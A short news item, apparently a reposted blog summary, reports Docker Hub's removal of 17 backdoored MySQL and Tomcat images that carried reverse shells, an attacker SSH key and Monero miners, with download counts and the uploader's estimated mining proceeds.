Docker Hub recently removed 17 backdoored Docker images. This action came after Fortinet reported some cryptomining activity which linked back to these images. Here are some of the interesting facts:

Backdoors were hidden inside the MySQL and Tomcat images, which are some of the most popular application containers on Docker Hub.

These backdoored images were uploaded as far back as May 2017, and have being used actively for over a year before these backdoors were discovered.

Some of these containers were installed more than one million times already, and some affected servers may still be compromised and have been lost from being able to be tracked.

It took quite a while before end users realized the malicious activity taking place.

The hidden backdoors or malicious programs included: Python Reverse Shell, Bash Reverse Shell, adding the attacker’s SSH key, embedded cryptocoin mining software, and more.

Cryptomining software was embedded in many of these images. Once this software runs, it will download a malicious .jpg file that runs in bash, or it downloads a malicious .sh file and runs in bash then exposes the mining software. Today hackers are using poisoned Docker images to install XMRig-based Monero miners, and it was said this uploader with username “docker123321” mined 544.74 Monero (about $90,000) using his/her victims’ systems. Today the latest news is that the South Korean cryptocurrency exchange Bithumb was hacked and $30 million in coins was stolen.

Read the entire article here, 17 Backdoored Malicious Images Removed From Docker Hub, But Are You Really Any Safer?

Via the fine folks at NeuVectdor.